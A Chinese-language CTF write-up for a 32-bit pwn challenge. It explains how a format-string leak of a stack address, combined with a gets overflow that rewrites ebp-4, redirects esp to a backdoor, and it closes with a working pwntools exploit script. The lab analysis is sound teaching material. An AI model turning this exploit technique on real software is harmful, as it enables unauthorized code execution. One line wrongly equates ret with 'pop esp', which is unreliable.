总结分析
这道题是一道简单的栈溢出漏洞,但是在leave指令后,利用lea指令给esp赋值别的地址,导致我们覆盖到返回地址的地址不能被跳转。
考点:
栈溢出
格式化字符串漏洞
0x1
第一步先查看一下保护机制和多少位的程序
checksec ./qiandao
32位程序只有NX保护扔进IDA观察
简单分析
1.main函数的最后有一个将ebp转为esp的代码,如果你栈溢出破坏了ebp,会导致[ecx-4]报错。
2.leave以后会修改esp为ecx-4,而ecx的值为ebp-4地址上的值。也就是:esp=[ebp-4]-4。
3.因此我们首先需要利用格式化字符漏洞泄漏栈地址,然后修改ebp-4为我们可控的地址,并且修改该地址-4处的值为backdoor,我们就可以获得shell了。
详细分析
大概了解一下函数返回时leave、ret、lea、mov四条指令的本质
1.leave指令相当于mov esp,ebp; pop ebp;即恢复上一个函数的栈结构
2.ret指令则相当于pop esp;也就是在ebp出栈之后,esp其实是指向返回地址的,就会将当前栈顶内容弹出到eip中进行执行
3.lea是load effective address的缩写,简单的说,lea指令可以用来将一个内存地址直接赋给目的操作数,例如:lea eax,[ebx+8]就是将ebx+8这个值直接赋给eax,而不是把ebx+8处的内存地址里的数据赋给eax。
4.而mov指令则恰恰相反,例如:mov eax,[ebx+8]则是把内存地址为ebx+8处的数据赋给eax。
再看一下这道题目中函数调用结束的指令:
在leave和ret之间执行了lea esp,[ecx-4]也就是将esp指向了ecx-4这个地址,我们看到前面的mov ecx,[ebp+var_4]得知了ecx存放的是ebp+var_4地址上的内容,而var_4是栈上比ebp低四字节的位置:也就是说esp=[ebp-4]-4。
思路总结
1.格式化字符串泄露栈地址
2.利用gets修改ebp-4的值为可控地址
3.修改可控地址-4处的值为backdoor
0x2
格式化字符漏洞泄露栈地址
在printf下断点/进行调试
gdb -q ./qiandao
b printf
r
bbbb
x/20wx 0xffffd040
通过打印0xffffd040处的内容的,发现了栈偏移为2
0x3
exp如下
from pwn import *
p = process('./qiandao')
#p = remote('ip',port)
back_addr = 0x0804857d
payload_1 = '%2$p'
p.recvuntil("name:")
p.sendline(payload_1)
p.recvuntil('0x')
stack_ebp = int(p.recv(8),16)
#prinf srack_ebp
stack_ecx = stack_ebp - 4
p.recvuntil("problem?")
payload_2 = 'a'*32 + p32(back_addr) + p32(stack_ecx)
p.sendline(payload_2)
p.interactive()
0x4
总结一下心里感受:南上加南。
推荐其他师傅的wp
此篇文章如果存在问题,还望大佬批评指正
